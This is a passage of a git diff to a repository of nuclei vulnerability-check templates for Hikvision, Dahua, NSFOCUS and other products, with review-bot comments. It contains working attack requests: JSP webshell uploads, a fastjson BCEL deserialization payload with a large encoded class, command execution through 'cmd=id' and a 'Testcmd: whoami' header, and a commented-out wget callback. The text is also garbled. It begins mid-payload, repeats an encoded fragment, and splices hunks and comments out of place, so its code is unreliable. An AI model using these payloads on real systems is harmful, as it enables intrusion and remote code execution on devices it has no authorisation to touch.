$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: 
word words: - - "nt authority\\system" + - '{{randstr}}' diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..0ebd67934b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
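Review bot: Every changed line of the new `info` block carries a typo: `HHIKVISION`, `zerZero Trust` and `Platfor` should read `HIKVISION iVMS-8700 upload Webshell file`, `Zero Trust Security Attack and Defense Laboratory` and `Platform`. `id: HIKVISION` is also the `id` of `poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml` after this commit, and template ids are expected to be unique; give each file a distinct, descriptive id (one derived from its filename would do). Like the other upload templates on this page, this one leaves `{{name}}.jsp` on the target and has no `tags`, so an `intrusive` tag and a sentence in `description` about the leftover file would be appropriate.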
@@ -1,48 +1,27 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + name: HIKVISION author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' - http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" - Content-Type: image/jpeg - - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - - - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: res_id - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - "nt authority\\system" diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml index fa3aafbfe2..c7afb0444b 100644 --- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml 
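Review bot: After this commit the file name no longer describes its content: the new blob `0ebd67934b` on this file's `index` line is the pre-commit blob of `Hikvision_iVMS-8700_upload.yaml`, so `Hikvision_iVMS-8700_upload_action.yaml` now holds the `/bic/ssoService/v1/applyCT` command-execution check while the upload check moved to the other file. If the intent was to swap the two templates, a rename (`git mv`) would keep the history readable; if not, one of the two files should be restored. The new `name: HIKVISION` and the generic `description` also lose the product version and interface information the removed `info` block carried, so report output no longer says which component was tested; the same non-descriptive `name` pattern is visible in the other two Hikvision hunks on this page.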
@@ -1,68 +1,50 @@ id: CVE-2023-3836 info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical + name: 大华-WPMS-upload-addimgico + author: hufei + severity: high description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. + 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.03083 - epss-percentile: 0.8997 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* + https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E metadata: + max-request: 1 + fofa-query: app="大华-智慧园区综合管理平台" + hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} + User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 177 + 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary + --e00b34d08d13639f8b619829b04c1a29 + Content-Disposition: form-data; name="upload"; filename="test.jsp" + Content-Type: image/gif + + {{randstr}} + --e00b34d08d13639f8b619829b04c1a29-- - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 + GET /upload/emap/society_new/{{name}} HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - extractors: - - type: regex - name: shell_filename + - type: json + name: name + json: + - ".data" internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: word + words: + - '{{randstr}}' \ No newline at end of file diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index a8f9cbe173..b35ef84818 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml 
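Review bot: The new `info` block keeps the context line `id: CVE-2023-3836` but drops the `classification` (cve-id, cwe-id, cvss), the NVD/VulDB `reference` entries, `remediation` and the whole `tags` line, so the template can no longer be selected by tag or traced to the advisory it is named after. The severity also moves from `critical` to `high` with no rationale, and the single remaining `reference` is a bare scalar where the sibling templates use a list (`reference:` / `  - https://github.com/PeiQi0/...`). I would keep the removed `classification` block and `tags: cve,cve2023,dahua,fileupload,intrusive,rce` next to the new Chinese description. The same hunk (identical index hashes) is applied to poc/upload/dahua-wpms-addimgico-fileupload.yaml and, per the header at the end of this chunk, poc/wordpress/dahua-wpms-addimgico-fileupload.yaml; neither `microsoft` nor `wordpress` matches a Dahua product, so these look like misfiled copies rather than deliberate placement.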
@@ -1,59 +1,49 @@ id: Green-Alliance info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability + name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets + Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - + fofa-query: body="'/needUsbkey.php?username='" + hunter-query: web.body="'/needUsbkey.php?username='" http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - - --4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 + - method: GET + path: + - "{{BaseURL}}/webconf/Exec/index?cmd=id" + matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and + - type: word + part: body + words: + - "200" + + - type: status + status: + - 200 + + +# http: +# - method: GET +# path: +# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" + +# attack: clusterbomb +# matchers-condition: or +# matchers: +# - type: word +# part: interactsh_protocol +# name: http +# words: +# - "http" + +# - type: word +# part: interactsh_protocol +# name: dns +# words: +# - "dns" diff --git a/poc/other/fastbee.yaml b/poc/other/fastbee.yaml new file mode 100644 index 0000000000..4624911885 --- /dev/null +++ b/poc/other/fastbee.yaml @@ -0,0 +1,20 @@ +id: fastbee +info: + name: fastbee + author: cn-kali-team + tags: detect,tech,fastbee + severity: info + metadata: + fofa-query: + - fastbee + product: fastbee + vendor: fastbee + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - fastbee diff --git a/poc/other/horizon.yaml b/poc/other/horizon.yaml index 4627d13031..0534f296d9 100644 --- a/poc/other/horizon.yaml +++ b/poc/other/horizon.yaml 
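Review bot: The body matcher at the end of the new hunk, `words: - "200"`, is generic enough to match almost any response that happens to contain those three digits, and paired only with `status: 200` under `matchers-condition: and` it will report findings on unrelated pages; tighten it to a token specific to this endpoint's response or drop the `part: body` matcher rather than keep one that cannot discriminate. The file is still named Nsfocus_sas_getFile_read.yaml and keeps `id: Green-Alliance`, while the new `name` describes a SAS fortress `Exec` command-execution check, so id, filename and content no longer agree. The new `description` merely repeats the `name` verbatim. The trailing commented-out interactsh variant is dead text inside the template; either delete it or record it in a separate note outside the file.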
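Review bot: The detection in the new fastbee.yaml rests on the single case-sensitive word `fastbee` appearing anywhere in the response to `/`, with no `part` and no second condition, which is a weak fingerprint for a `detect,tech` template. Consider `case-insensitive: true` on the word matcher and a second matcher (status or header) under `matchers-condition: and`. The `fofa-query` here is written as a list while every other template in this commit uses a scalar; pick one form for the repository.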
@@ -1,21 +1,24 @@ id: vmware-horizon + info: - name: VMware Horizon Login - author: dhiyaneshDK + name: VMware Horizon + author: pdteam severity: info - reference: https://www.exploit-db.com/ghdb/6496 - tags: panel + tags: vmware,horizon + requests: - method: GET path: - - '{{BaseURL}}/portal/webclient/index.html' - matchers-condition: or + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word - part: body words: - - 'VMware Horizon' - - type: regex - part: body - regex: - - '(?m)^Missing route token in request$' + - 'VMware Horizon' diff --git a/poc/other/mercurial-hgignore.yaml b/poc/other/mercurial-hgignore.yaml new file mode 100644 index 0000000000..c05141fe49 --- /dev/null +++ b/poc/other/mercurial-hgignore.yaml 
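Review bot: The new side introduces the HTTP section under `requests:` while every other template in this commit uses `http:`; as far as I know `requests` is the older spelling that current nuclei releases warn about, so this should read `http:` for consistency. The rewrite also drops the `reference:` line and the `panel` tag without replacement, leaving no source against which the `VMware Horizon` fingerprint can be verified. Keep a `reference:` entry (the old GHDB URL or the vendor page) and consider `tags: panel,vmware,horizon`.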
@@ -0,0 +1,49 @@ +id: mercurial-hgignore + +info: + name: Mercurial Ignore - File Disclosure + author: DhiyaneshDK + severity: info + description: Mercurial Ignore file disclosure was detected. + reference: + - https://swcarpentry.github.io/hg-novice/08-ignore/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: html:"hgignore" + tags: exposure,hgignore,config,mercurial + +http: + - method: GET + path: + - "{{BaseURL}}/.hgignore" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'len(body) > 50' + - 'status_code == 200' + condition: and + + - type: word + words: + - "MongoDB over HTTP on the native" + - "application/javascript" + - "application/x-javascript" + - "application/json" + - "application/xml" + - "html" + - " ------WebKitFormBoundary9PggsiM755PLa54a-- - + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_upload.yaml b/poc/upload/Hikvision_iVMS-8700_upload.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload.yaml 
@@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": 